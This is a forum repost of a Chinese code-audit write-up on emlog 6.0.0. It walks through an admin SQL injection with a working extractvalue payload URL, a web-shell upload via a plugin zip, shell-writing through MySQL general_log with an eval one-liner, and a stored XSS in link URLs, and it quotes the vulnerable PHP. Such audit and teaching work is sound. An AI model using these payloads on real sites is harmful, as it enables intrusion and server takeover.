CMS代码审计之emlog 6.0-外链论坛 - Powered by Discuz! Archiver

ikkhksvu 发表于 2024-10-3 13:03:18

CMS代码审计之emlog 6.0

<h2 style="color: black; text-align: left; margin-bottom: 10px;">1、前言</h2>
本小菜亦是刚起始玩代码审计，近期发掘个比较有趣的CMS跟大众分享一波，虽然只找到有些鸡肋漏洞。废话不多说起始进入正题，这次审计的CMS是emlog 6.0.0版本，官方位置为：http://www.emlog.net。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrsjbb1HCLPjqrVPS3R5qtALyYhrwTcqtutaScMFIKsHNlUgZSGdHfoQ/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIr9IaFDgSL6ecJk5G5D99poHOATxohPBuR8h4GXT9zqibDWeJZ34L8Cqw/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<h2 style="color: black; text-align: left; margin-bottom: 10px;">2、审计思路</h2>
在学习先辈们的文案后，自己稍微总结一下代码审计的思路重点能够分为以下四种。
1） 查询可控变量，正向跟踪变量传递过程，查看变量是不是进行进行过滤，是不是进行后台交互。
2） 查询敏锐函数，如Select、Insert等，回溯该函数的参数是不是进行过滤、是不是可控。
3）寻敏锐功能点，通读功能点模块，如上传点。
4）直接通读全文代码，这种方式能够更好的理解代码的业务规律，能够挖掘出更有价值的漏洞
<h2 style="color: black; text-align: left; margin-bottom: 10px;">3、审计过程</h2>
<h3 style="color: black; text-align: left; margin-bottom: 10px;">1. Sql注入</h3>
废话不多说，像本小菜这种级别的还是比较爱好第1种思路，简单粗暴。
首要认识一下代码大概规律结构，而后用notepad大法搜索一下$_GET参数瞧瞧那些输入没进行过滤，咱们再进行切入。经过搜索发掘/admin/comment.php中未对$_GET[‘ip’]进行任何限制，接下来就查看IP这个参数是不是进行了敏锐操作。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrY0aTJCn0C9qAKZOK97g0IOd1zrTxf8ibSj6pzUTdyynaqnnZPpYmRaQ/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
当action等于delbyip时，对token进行判定，查看是不是是管理员，而后将$_GET[‘ip’]赋值给$ip，而后再调用dleCommentByIp($ip)函数，代码如下：if ($action== delbyip) {
   LoginAuth::checkToken();if (ROLE != ROLE_ADMIN) {
       emMsg(权限不足！, ./);
   }
   $ip = isset($_GET[ip]) ? $_GET[ip] : ;
   $Comment_Model->delCommentByIp($ip);
   $CACHE->updateCache(array(sta,comment));
   emDirect("./comment.php?active_del=1");
}接下来进行跟进class Comment_Model的delCommentByIp函数，继续运用搜索大法，在/inludes/model/comment_model.php中发掘delCommentByIp函数，跟进delCommentByIp函数，能够看出这个函数直接将传入的参数$ip,代入“SELECT DISTINCT gid FROM “.DB_PREFIX.”comment WHERE ip=’$ip’”进行sql查找，此过程中未发掘任何过滤行径，咱们只需经过封闭单引号而后进行报错注入。function delCommentByIp($ip) {
       $blogids = array();
       $sql ="SELECT DISTINCT gid FROM ".DB_PREFIX."comment WHERE ip=$ip";
       $query = $this->db->query($sql);        while($row = $this->db->fetch_array($query)) {
           $blogids[] = $row[gid];
       }
       $this->db->query("DELETE FROM ".DB_PREFIX."comment WHERE ip=$ip"
);
        $this->updateCommentNum($blogids);
    }
接下来就进行漏洞验证了，拜访http://127.0.0.1/emlog/admin/comment.php，点击按照ip删除，用burpsuite抓取数据包，构造payload
/emlog/admin/comment.php?action=delbyip&token=abac6e12c2abe9b29797b64481ef6ed4&ip=127.0.0.1′and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#  注入时得进行编码处理才可成功，当然各位师傅的骚操作比我多。

<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrFXUiaKbbURiaAicVVIwibIqgkdOczTx60Md7fEdjUv6y6YM3zPGGl3LbOw/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">比较尴尬的是该注入点进行了权限校验，亦便是说仅有管理员才可注入，因此该漏洞非常的鸡肋，当然亦只是分享一下自己的学习审计过程。
<h3 style="color: black; text-align: left; margin-bottom: 10px;">2. 文件上传漏洞</h3>
在admin/plugin.php插件上传处存在上传漏洞，经过上传zip压缩的文件，就可上传木马文件。在plugin.php约79行处的上传点当action为upload_zip进行判断，先判断是不是上传文件是不是为空..if ($action == upload_zip) {
   LoginAuth::checkToken();
   $zipfile = isset($_FILES[pluzip]) ? $_FILES[pluzip] : ;    if ($zipfile[error] == 4) {
       emDirect("./plugin.php?error_d=1");
   }    if (!$zipfile || $zipfile[error] >= 1 || empty($zipfile[tmp_name])) {
       emMsg(插件上传失败);
   }    if (getFileSuffix($zipfile[name]) != zip) { //判断后缀名是不是为zip
       emDirect("./plugin.php?error_f=1");
   }

   $ret = emUnZip($zipfile[tmp_name], ../content/plugins/, plugin);//解压zip文件到../content/plugins/目录下
   switch ($ret) {        case 0:
           emDirect("./plugin.php?activate_install=1#tpllib");            break;        case -1:
           emDirect("./plugin.php?error_e=1");            break;        case 1:        case 2:
           emDirect("./plugin.php?error_b=1");            break;        case 3:
           emDirect("./plugin.php?error_c=1");            break;
   }
}而后经过include\lib\function.base.php中的getFilesuSuffix函数获取后缀名，并判断是不是为zip。function getFileSuffix($fileName) {    return
 strtolower(pathinfo($fileName,  PATHINFO_EXTENSION));
 }
之后经过include\lib\function.base.php中emUnzip函数进行解压zip文件，在解压的过程中会对压缩包里的文件名叫作进行判断，倘若你压缩包名叫作为test则压缩包里必须存在test.php文件，否者会进行报错。
function emUnZip($zipfile, $path, $type = tpl) {    if(!class_exists(ZipArchive, FALSE)) {        return 3;//zip模块问题
   }
   $zip = new ZipArchive();    if (@$zip->open($zipfile) !== TRUE) {        return 2;//文件权限问题
   }
   $r = explode(/, $zip->getNameIndex(0), 2);
   $dir = isset($r[0]) ? $r[0] . / : ;    switch ($type) {        case tpl:
           $re = $zip->getFromName($dir . header.php);            if (false === $re)                return -2;            break;        case plugin:
           $plugin_name = substr($dir, 0, -1);
           $re = $zip->getFromName($dir . $plugin_name . .php);//判断是不是存在与文件夹名叫作相同的php文件
           if (false === $re)                return -1;            break;        case backup:
           $sql_name = substr($dir, 0, -1);            if (getFileSuffix($sql_name) != sql)                return -3;            break;        case update:            break;
   }    if (true === @$zip->extractTo($path)) {
       $zip->close();        return 0;
   } else {        return 1;//文件权限问题

    }
 }
漏洞验证：
将一句话木马以zip格式进行压缩
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrcicjiad9KicQlTW00RDxicJ2oiby0x2vuT623DCdBuMeRAicGF0FbR8iaIDicg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">而后在插件上传处上传插件
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIruB1A00s8orwgcTpVN9LsS5Rqgq84FaeSFicNtEWABPTn8CH0xK5nnuw/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
上传成功后运用菜刀连接content/plugins/test1/test1.php，获取webshell。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrIiau80QHMyugCe72HNM8Cy8xjbF3hKf1PEmOqxgV8S4daJu5Aj17hvg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<h3 style="color: black; text-align: left; margin-bottom: 10px;">3. 数据库备份拿shell</h3>
数据库拿shell重点有两种方式：
1、select …into outfile  利用需要的要求有：对web目录需要有写权限；能够运用单引号；晓得绝对路径；无配置-secure-file-priv
2、经过general_log，将日志写入特定目录下，利用要求又：对web目录需要要写权限；能够运用单引号；晓得绝对路径；能够执行多行sql语句。
先尝试第1种办法，先备份sql语句，在其基本上插进select “<?php @eval($_POST) ?>” into outfile ‘eval.php’语句就ok了,然则因为配置了secure-file-priv,因此GG,这个办法行不通。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrXPm44yYsxpjEib8p23Zhib1r1CQicOOibEzbehCAj3fd7JLDm1gSfdkibuA/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrRaWrqDgDuX1cUhFQp6UJAEk7nbokhH4W3wV9j7KN1Z4nPFwZ5ZUBMg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrPhTESmNycbGNLSNyU4DPqibtyou3NB7esCE0Q8sZDc3Lt0eriao5tqUA/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
运用第二种办法，设置了 general_log 和 general_log_file之后所有SQL记录都会写入指定的文件，因此能够经过这种办法将php语句写到log中。查找语句如下
set global general_log=on;
SET global general_log_file=C:/phpStudy/PHPTutorial/WWW/emlog/eval.php; 
SELECT <?php phpinfo();?>;
接下来操作如上导入备份文件就可，在C:/phpStudy/PHPTutorial/WWW/emlog/目录下生成eval.php的log文件。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIraNFXz4XcdGu1nWVtWbCebY0aJ1BDPD1Iia2nnnqdr7fBnTqvVCCdKuw/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
拜访http://127.0.0.1/emlog/eval.php，查看获取shell。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrlmJ1OUbK2N6nUWn5nw81IIFibkXdjTIW649KmCXJZibcOAKBQhawibW7w/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<h3 style="color: black; text-align: left; margin-bottom: 10px;">4. 存储型xss</h3>
后台链接添加处admin/link.php 【http://localhost/admin/link.php】,siteurl参数输出时未进行实体化处理引起，存储型xss。在$action=addlink时，经过addslashes函数进行转义处理，防止进行sql注入，然则未进行任何的html实体化，或过滤处理。经过第44行代码可发掘进行了正则匹配因此咱们构造的payload需以http、ftp开头，才可进型数据插进。if ($action== addlink) {
   $taxis = isset($_POST[taxis]) ? intval(trim($_POST[taxis])) : 0;
   $sitename =isset($_POST[sitename]) ? addslashes(trim($_POST[sitename])) : ;
   $siteurl = isset($_POST[siteurl]) ? addslashes(trim($_POST[siteurl])) : ;
   $description =isset($_POST[description]) ? addslashes(trim($_POST[description])) : ;    if ($sitename == || $siteurl ==) {
       emDirect("./link.php?error_a=1");
   }    if (!preg_match("/^http|ftp.+$/i", $siteurl)) { //需以http、ftp开头，
       $siteurl = http://.$siteurl;
   }
   $Link_Model->addLink($sitename, $siteurl, $description, $taxis);
   $CACHE->updateCache(link);
   emDirect("./link.php?active_add=1");
}经过addLink函数插进链接，接下来跟进/include/model/link_model.php中的link_Model->addLink函数，该函数将经过addslashes转义完的链接插进数据库进行存储。function addLink($name, $url, $des, $taxis) { if ($taxis > 30000 || $taxis < 0) { $taxis = 0;
} $sql="insert into ".DB_PREFIX."link (sitename,siteurl,description,taxis) values($name,$url,$des, $taxis)"; $this->db->query($sql);
}接下来跟进输出状况，当action参数为空，经过/include/model/link_model.php中的Link_Model->getLinks()函数从数据库查找sitename、description、siteurl，并返回查找结果，最后由View::output()进行输出。getLinks()函数查找数据库获取，获取sitename、description、siteurl数据，查看可发掘未对siteurl参数进行实体化和过滤处理。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrMwTLkjjFLR6jRd9vrqW5xcxVRW1vF2R2f18j6lDM4p44r6KIjXhDMw/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
查看/include/lib/view.php 中的View::output函数，最后结果经过echo输出，在全部过程都未对siteurl进行实体化、过滤处理，引起最后导致存储型xss。
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIricawjD7gDE7NRSIowB6k2ib5uVISnwRhPGXqchGkEMnYnjUUN2Qjxzvw/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
漏洞验证
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrHk7q7Vzb2P0GEDQbPTmEyvfbibia5VmSPWZUbNW5Sfz1gia13G7nicGLCg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<img src="https://mmbiz.qpic.cn/mmbiz_jpg/b8ibibLfdoP5RtjnX0q3V5IpPezg90rrIrvd9pLjnmgnJ0oES9jLjuwfbB1zT6jgKHyneOEFpoNCNeP6DknoeGFg/640?wx_fmt=jpeg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
4、结束语
这个cms漏洞当然不止这些，还有非常多问题。其实全部过程中审计的漏洞利用价值都不大，堪叫作鸡肋，本文只是分享自己学习的过程，由简单到繁杂，分享一下自己的学习体会罢了，望各位师傅多多包涵。
*本文作者：fishyyh，转载请注明来自FreeBuf.COM。
<img src="data:image/svg+xml,%3C%3Fxml version=1.0 encoding=UTF-8%3F%3E%3Csvg width=1px height=1px viewBox=0 0 1 1 version=1.1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Ctitle%3E%3C/title%3E%3Cg stroke=none stroke-width=1 fill=none fill-rule=evenodd fill-opacity=0%3E%3Cg transform=translate(-249.000000, -126.000000) fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E" style="width: 50%; margin-bottom: 20px;">

4lqedz 发表于 2024-10-23 09:44:22

你的话语真是温暖如春，让我心生感激。

4lqedz 发表于 6 天前

“沙发”（SF，第一个回帖的人）‌

页: [1]

外链论坛's Archiver

CMS代码审计之emlog 6.0